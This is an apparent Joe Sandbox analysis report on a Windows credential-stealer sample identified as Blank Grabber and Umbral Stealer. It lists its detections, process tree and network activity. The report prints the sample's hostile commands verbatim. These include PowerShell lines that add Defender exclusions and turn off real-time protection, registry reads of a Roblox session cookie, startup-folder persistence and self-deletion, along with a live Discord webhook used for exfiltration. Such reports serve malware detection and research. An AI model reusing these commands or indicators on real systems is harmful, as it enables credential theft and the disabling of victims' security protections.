Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IDLBk4XMUa.exe

Overview

General Information

Sample name:IDLBk4XMUa.exe
renamed because original name is a hash value
Original sample name:0933217d8ea84d9341154ecc34a3f231cf2ff0e70d67dbe190265c7e26b96cfb.exe
Analysis ID:1487993
MD5:ae3713305401315a3b520e84fb786fe5
SHA1:914bd258c204e4cddab9dc0dbfb9c7134659ad57
SHA256:0933217d8ea84d9341154ecc34a3f231cf2ff0e70d67dbe190265c7e26b96cfb
Tags:exe
Infos:

Detection

Blank Grabber, Umbral Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • IDLBk4XMUa.exe (PID: 5076 cmdline: "C:\Users\user\Desktop\IDLBk4XMUa.exe" MD5: AE3713305401315A3B520E84FB786FE5)
    • WMIC.exe (PID: 2144 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7392 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\IDLBk4XMUa.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7436 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7616 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7696 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7820 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8040 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 1648 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7180 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7404 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6328 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7720 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5500 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\IDLBk4XMUa.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7792 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup

Malware Configuration

Threatname: Umbral Stealer

{"C2 url": "https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL", "Version": "v1.3"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
IDLBk4XMUa.exeJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    IDLBk4XMUa.exeJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
      IDLBk4XMUa.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
      • 0x31890:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      • 0x31a16:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      • 0x31ab2:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scrJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scrJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scrINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
          • 0x31890:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
          • 0x31a16:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
          • 0x31ab2:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 4 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.0.IDLBk4XMUa.exe.20096170000.0.unpackJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                      0.0.IDLBk4XMUa.exe.20096170000.0.unpackJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                        0.0.IDLBk4XMUa.exe.20096170000.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                        • 0x31890:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                        • 0x31a16:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                        • 0x31ab2:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IDLBk4XMUa.exe", ParentImage: C:\Users\user\Desktop\IDLBk4XMUa.exe, ParentProcessId: 5076, ParentProcessName: IDLBk4XMUa.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', ProcessId: 7436, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Disable Scan Feature
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IDLBk4XMUa.exe", ParentImage: C:\Users\user\Desktop\IDLBk4XMUa.exe, ParentProcessId: 5076, ParentProcessName: IDLBk4XMUa.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 7696, ProcessName: powershell.exe
                        Sigma detected: Suspicious Startup Folder Persistence
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\IDLBk4XMUa.exe, ProcessId: 5076, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NcIxl.scr
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IDLBk4XMUa.exe", ParentImage: C:\Users\user\Desktop\IDLBk4XMUa.exe, ParentProcessId: 5076, ParentProcessName: IDLBk4XMUa.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', ProcessId: 7436, ProcessName: powershell.exe
                        Sigma detected: SCR File Write Event
                        Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\IDLBk4XMUa.exe, ProcessId: 5076, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NcIxl.scr
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\IDLBk4XMUa.exe, ProcessId: 5076, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NcIxl.scr
                        Sigma detected: Suspicious Screensaver Binary File Creation
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\IDLBk4XMUa.exe, ProcessId: 5076, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NcIxl.scr
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IDLBk4XMUa.exe", ParentImage: C:\Users\user\Desktop\IDLBk4XMUa.exe, ParentProcessId: 5076, ParentProcessName: IDLBk4XMUa.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe', ProcessId: 7436, ProcessName: powershell.exe

                        Snort Signatures

                        Suricata Signatures

                        Timestamp:2024-08-05T14:58:58.214926+0200
                        SID:2045593
                        Source Port:49707
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-05T14:58:38.291208+0200
                        SID:2803305
                        Source Port:49705
                        Destination Port:80
                        Protocol:TCP
                        Classtype:Unknown Traffic

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: IDLBk4XMUa.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scrAvira: detection malicious, Label: HEUR/AGEN.1307507
                        Found malware configuration
                        Source: IDLBk4XMUa.exeMalware Configuration Extractor: Umbral Stealer {"C2 url": "https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL", "Version": "v1.3"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scrReversingLabs: Detection: 81%
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scrVirustotal: Detection: 86%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: IDLBk4XMUa.exeVirustotal: Detection: 86%Perma Link
                        Source: IDLBk4XMUa.exeReversingLabs: Detection: 81%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Machine Learning detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scrJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: IDLBk4XMUa.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeCode function: 0_2_00007FFAACEA3743 CryptUnprotectData,0_2_00007FFAACEA3743
                        Source: IDLBk4XMUa.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49707 version: TLS 1.2
                        Source: IDLBk4XMUa.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL
                        Uses ping.exe to check the status of other devices and networks
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: Process Memory Space: IDLBk4XMUa.exe PID: 5076, type: MEMORYSTR
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
                        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: ptb.discord.com
                        Source: unknownHTTP traffic detected: POST /api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: ptb.discord.comContent-Length: 939Expect: 100-continueConnection: Keep-Alive
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: IDLBk4XMUa.exe, NcIxl.scr.0.drString found in binary or memory: http://ip-api.com/json/?fields=225545
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: IDLBk4XMUa.exe, NcIxl.scr.0.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                        Source: powershell.exe, 0000000E.00000002.1352099439.00000296B1F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.000001714092F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.0000017140A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.000001713217B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDE0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B357376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000001F.00000002.1666525413.000002B35722D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ptb.discord.com
                        Source: powershell.exe, 0000000E.00000002.1329869038.00000296A20D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1329869038.00000296A1EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1372613414.000001D7A7425000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.00000171308B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B3559C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 0000000E.00000002.1329869038.00000296A20D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000014.00000002.1406940608.00000171320AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDA18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B356E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 0000001F.00000002.1666525413.000002B35722D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000017.00000002.1609749890.00000268E4994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                        Source: powershell.exe, 0000000E.00000002.1329869038.00000296A1EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1372613414.000001D7A745C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1372613414.000001D7A7449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.00000171308B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B3559C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200981D6000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FC8000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?ex=
                        Source: powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: NcIxl.scr.0.drString found in binary or memory: https://discord.com/api/v10/users/
                        Source: IDLBk4XMUa.exe, NcIxl.scr.0.drString found in binary or memory: https://discordapp.com/api/v9/users/
                        Source: NcIxl.scr.0.drString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                        Source: powershell.exe, 0000001F.00000002.1666525413.000002B35722D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                        Source: IDLBk4XMUa.exe, NcIxl.scr.0.drString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FC8000.00000004.00000800.00020000.00000000.sdmp, IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1193832993945563176/12700031
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.00000200981D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?e
                        Source: powershell.exe, 0000000E.00000002.1352099439.00000296B1F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.000001714092F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1472391060.0000017140A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1406940608.000001713217B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1598197185.00000268DC4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1501813007.00000268CDE0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1666525413.000002B357376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1787792415.000002B365B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
